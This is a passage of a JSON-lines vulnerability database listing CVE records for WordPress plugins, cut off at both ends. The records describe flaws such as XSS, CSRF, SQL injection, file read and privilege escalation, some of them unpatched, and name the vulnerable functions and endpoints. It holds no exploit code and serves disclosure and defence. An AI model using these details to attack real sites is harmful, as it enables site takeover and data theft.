ame\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/397555cf-0b0c-4ce5-97ad-59f135f9d195?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5564","slug":"gc-social-wall","versionImpact":"1.15","description":"The GC Social Wall plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'gc_social_wall' shortcode in all versions up to, and including, 1.15 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/gc-social-wall\\\/trunk\\\/GCSocialWall.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/gc-social-wall\\\/trunk\\\/GCSocialWall.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cfe548ce-5dc9-4073-b755-d28e37720808?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cfe548ce-5dc9-4073-b755-d28e37720808?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7780","slug":"ai-engine","versionImpact":"2.9.4","description":"The AI Engine plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.9.4. The simpleTranscribeAudio endpoint fails to restrict URL schemes before calling get_audio(). This makes it possible for authenticated attackers, with Subscriber-level access and above, to read any file on the web server and exfiltrate it via the plugin\u2019s OpenAI API integration.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ai-engine\\\/tags\\\/2.9.3\\\/classes\\\/api.php#L625\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ai-engine\\\/tags\\\/2.9.3\\\/classes\\\/api.php#L625\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ai-engine\\\/tags\\\/2.9.3\\\/classes\\\/engines\\\/chatml.php#L829\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ai-engine\\\/tags\\\/2.9.3\\\/classes\\\/engines\\\/chatml.php#L829\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3332540\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3332540\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ai-engine\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ai-engine\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/513274bc-3016-4adb-be78-b13c5fae9c03?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/513274bc-3016-4adb-be78-b13c5fae9c03?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0175","slug":"smart-logo-showcase-lite","versionImpact":"1.1.9","description":"The Responsive Clients Logo Gallery Plugin for WordPress plugin through 1.1.9 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cdcd3c2c-cb29-4b21-8d3d-7eafbc1d3098\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cdcd3c2c-cb29-4b21-8d3d-7eafbc1d3098\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2608","slug":"multiple-pages-generator-by-porthas","versionImpact":"3.3.17","description":"The Multiple Page Generator Plugin for WordPress is vulnerable to Cross-Site Request Forgery leading to time-based SQL Injection via the orderby and order parameters in versions up to, and including, 3.3.17 due to missing nonce verification on the projects_list function and insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries leading to resource exhaustion via a forged request granted they can trick an administrator into performing an action such as clicking on a link. Version 3.3.18 addresses the SQL Injection, which drastically reduced the severity.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2910686%40multiple-pages-generator-by-porthas%2Ftrunk&old=2905353%40multiple-pages-generator-by-porthas%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2910686%40multiple-pages-generator-by-porthas%2Ftrunk&old=2905353%40multiple-pages-generator-by-porthas%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2912909%40multiple-pages-generator-by-porthas&new=2912909%40multiple-pages-generator-by-porthas&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2912909%40multiple-pages-generator-by-porthas&new=2912909%40multiple-pages-generator-by-porthas&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d900584c-0f58-4abc-92ff-841f898d02fc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d900584c-0f58-4abc-92ff-841f898d02fc?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/multiple-pages-generator-by-porthas\\\/trunk\\\/controllers\\\/ProjectsListManage.php#L40\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/multiple-pages-generator-by-porthas\\\/trunk\\\/controllers\\\/ProjectsListManage.php#L40\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1978","slug":"shiftcontroller","versionImpact":"4.9.25","description":"The ShiftController Employee Shift Scheduling plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the query string in versions up to, and including, 4.9.25 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b5c61212-e68e-4198-b078-18121576b767?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b5c61212-e68e-4198-b078-18121576b767?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2898274\\\/shiftcontroller\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2898274\\\/shiftcontroller\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3092","slug":"smtp-mail","versionImpact":"1.2.16","description":"The SMTP Mail plugin for WordPress is vulnerable to Stored Cross-Site Scripting via an email subject in versions up to, and including, 1.2.16 due to insufficient input sanitization and output escaping when the 'Save Data SendMail' feature is enabled. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smtp-mail\\\/trunk\\\/includes\\\/data-list-table.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smtp-mail\\\/trunk\\\/includes\\\/data-list-table.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8ae734d1-0cd4-4ff5-8448-828b0fb64f70?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8ae734d1-0cd4-4ff5-8448-828b0fb64f70?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0768","slug":"envo-elementor-for-woocommerce","versionImpact":"1.4.4","description":"The Envo's Elementor Templates & Widgets for WooCommerce plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to and including 1.4.4. This is due to missing or incorrect nonce validation on the ajax_theme_activation function. This makes it possible for unauthenticated attackers to activate arbitrary installed themes via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6504ae5c-a36d-495e-aa93-40a3753857c6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6504ae5c-a36d-495e-aa93-40a3753857c6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/envo-elementor-for-woocommerce\\\/trunk\\\/includes\\\/admin\\\/include\\\/template-library.php#L367\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/envo-elementor-for-woocommerce\\\/trunk\\\/includes\\\/admin\\\/include\\\/template-library.php#L367\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1293","slug":"brizy","versionImpact":"2.4.40","description":"The Brizy \u2013 Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the embedded media custom block in all versions up to, and including, 2.4.40 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/57dac6de-545f-49e5-9f45-d90a48d6b05f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/57dac6de-545f-49e5-9f45-d90a48d6b05f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3034945%40brizy%2Ftrunk&old=3032616%40brizy%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3034945%40brizy%2Ftrunk&old=3032616%40brizy%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2960","slug":"svs-pricing-tables","versionImpact":"1.0.4","description":"The SVS Pricing Tables plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.4. This is due to missing or incorrect nonce validation on the deletePricingTable() function. This makes it possible for unauthenticated attackers to delete pricing tables via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e7a24213-5191-4b6d-a2d1-7b79729e6517?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e7a24213-5191-4b6d-a2d1-7b79729e6517?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/svs-pricing-tables\\\/trunk\\\/app\\\/model\\\/svs_pt_model_main.php#L91\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/svs-pricing-tables\\\/trunk\\\/app\\\/model\\\/svs_pt_model_main.php#L91\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5342","slug":"simple-image-popup-shortcode","versionImpact":"1.0","description":"The Simple Image Popup Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'sips_popup' shortcode in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/11fb823c-c3d3-456d-b606-b01a8307c25a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/11fb823c-c3d3-456d-b606-b01a8307c25a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-image-popup-shortcode\\\/trunk\\\/sips-popup.php#L27\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-image-popup-shortcode\\\/trunk\\\/sips-popup.php#L27\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6010","slug":"cost-calculator-builder-pro","versionImpact":"3.1.96","description":"The Cost Calculator Builder PRO plugin for WordPress is vulnerable to price manipulation in all versions up to, and including, 3.1.96. This is due to the plugin allowing the price field to be manipulated prior to processing via the 'create_cc_order' function, called from the Cost Calculator Builder plugin. This makes it possible for unauthenticated attackers to manipulate the price of orders submitted via the calculator. Note: this vulnerability was partially patched with the release of Cost Calculator Builder version 3.2.17.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fc04e676-e394-488e-a239-95af5f865613?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fc04e676-e394-488e-a239-95af5f865613?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cost-calculator-builder\\\/trunk\\\/frontend\\\/dist\\\/order.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cost-calculator-builder\\\/trunk\\\/frontend\\\/dist\\\/order.js\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8989","slug":"stars-testimonials-with-slider-and-masonry-grid","versionImpact":"3.3.1","description":"The Free Responsive Testimonials, Social Proof Reviews, and Customer Reviews \u2013 Stars Testimonials plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's stars_testimonials shortcode in all versions up to, and including, 3.3.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b406f0b8-16b5-49ca-88d8-7717bef1ae61?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b406f0b8-16b5-49ca-88d8-7717bef1ae61?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/stars-testimonials-with-slider-and-masonry-grid\\\/trunk\\\/plugin.class.php#L1281\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/stars-testimonials-with-slider-and-masonry-grid\\\/trunk\\\/plugin.class.php#L1281\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/stars-testimonials-with-slider-and-masonry-grid\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/stars-testimonials-with-slider-and-masonry-grid\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3159818\\\/#file8\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3159818\\\/#file8\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3159818\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3159818\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10055","slug":"support-chat","versionImpact":"2.3.3","description":"The Click to Chat \u2013 WP Support All-in-One Floating Widget plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's wpsaio_snapchat shortcode in all versions up to, and including, 2.3.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b4c13600-0791-4ade-9c28-f43f164aedae?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b4c13600-0791-4ade-9c28-f43f164aedae?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/support-chat\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/support-chat\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3169768\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3169768\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10709","slug":"wp-yadisk-files","versionImpact":"1.2.5","description":"The YaDisk Files WordPress plugin through 1.2.5 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/114aeaf7-32a5-4510-a497-92cc0951b022\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/114aeaf7-32a5-4510-a497-92cc0951b022\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11386","slug":"gatormail-smart-forms","versionImpact":"1.1.0","description":"The GatorMail SmartForms plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'gatormailsmartform' shortcode in all versions up to, and including, 1.1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gatormail-smart-forms\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gatormail-smart-forms\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c96e5939-5b6d-4cf2-83eb-a7b94f032bcb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c96e5939-5b6d-4cf2-83eb-a7b94f032bcb?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13558","slug":"woo-rfq-for-woocommerce","versionImpact":"1.9.179","description":"The NP Quote Request for WooCommerce plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 1.9.179 due to missing validation on a user controlled key. This makes it possible for unauthenticated attackers to read the content of quote requests.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3256816\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3256816\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/woo-rfq-for-woocommerce\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/woo-rfq-for-woocommerce\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5991c86b-6785-41a6-a5df-c65e8a28201c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5991c86b-6785-41a6-a5df-c65e8a28201c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4591","slug":"weluka-lite","versionImpact":"1.0.3","description":"The Weluka Lite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'weluka-map' shortcode in all versions up to, and including, 1.0.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/weluka-lite\\\/trunk\\\/class-weluka-builder.php#L4666\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/weluka-lite\\\/trunk\\\/class-weluka-builder.php#L4666\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d21a12b4-2f9d-4ae3-a5f6-1ba90fab43a2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d21a12b4-2f9d-4ae3-a5f6-1ba90fab43a2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5559","slug":"timezonecalculator","versionImpact":"3.37","description":"The TimeZoneCalculator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'timezonecalculator_output' shortcode in all versions up to, and including, 3.37 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/timezonecalculator\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/timezonecalculator\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f1e1a9ab-9ba9-45ff-aecd-b8953abc653a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f1e1a9ab-9ba9-45ff-aecd-b8953abc653a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7695","slug":"integration-cds","versionImpact":"2.81","description":"The Dataverse Integration plugin for WordPress is vulnerable to Privilege Escalation due to missing authorization checks within its reset_password_link REST endpoint in versions 2.77 through 2.81. The endpoint\u2019s handler accepts a client-supplied id, email, or login, looks up that user, and calls get_password_reset_key() unconditionally. Because it only checks that the caller is authenticated, and not that they own or may edit the target account, any authenticated attacker, with Subscriber-level access and above, can obtain a password reset link for an administrator and hijack that account.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/integration-cds\\\/trunk\\\/src\\\/API\\\/AuthenticatedEndpoint.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/integration-cds\\\/trunk\\\/src\\\/API\\\/AuthenticatedEndpoint.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/integration-cds\\\/trunk\\\/src\\\/API\\\/Endpoints\\\/GetResetUserPasswordLink.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/integration-cds\\\/trunk\\\/src\\\/API\\\/Endpoints\\\/GetResetUserPasswordLink.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?new=3329717%40integration-cds%2Ftrunk&old=3323579%40integration-cds%2Ftrunk\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?new=3329717%40integration-cds%2Ftrunk&old=3323579%40integration-cds%2Ftrunk\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/integration-cds\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/integration-cds\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cfd35a3c-7203-4832-8b0d-56f3e7983118?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cfd35a3c-7203-4832-8b0d-56f3e7983118?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0167","slug":"getresponse-integration","versionImpact":"5.5.31","description":"The GetResponse for WordPress plugin through 5.5.31 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fafbf666-b908-48ef-9041-fea653e9bfeb\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fafbf666-b908-48ef-9041-fea653e9bfeb\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2528","slug":" contact-form-by-supsystic","versionImpact":"1.7.24","description":"The Contact Form by Supsystic plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.7.24. This is due to missing or incorrect nonce validation on the AJAX action handler. This makes it possible for unauthenticated attackers to execute AJAX actions via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c387b07-baf6-4c62-943e-4bd121160ceb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c387b07-baf6-4c62-943e-4bd121160ceb?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-form-by-supsystic\\\/trunk\\\/classes\\\/frame.php?rev=2912584#L230\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-form-by-supsystic\\\/trunk\\\/classes\\\/frame.php?rev=2912584#L230\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-form-by-supsystic\\\/trunk\\\/classes\\\/frame.php?rev=2777737#L297\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-form-by-supsystic\\\/trunk\\\/classes\\\/frame.php?rev=2777737#L297\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1917","slug":"powerpress","versionImpact":"10.0","description":"The PowerPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in versions up to, and including, 10.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. NOTE: A partial fix for the issue was introduced in version 10.0.1, and an additional patch (version 10.0.2) was released to address a 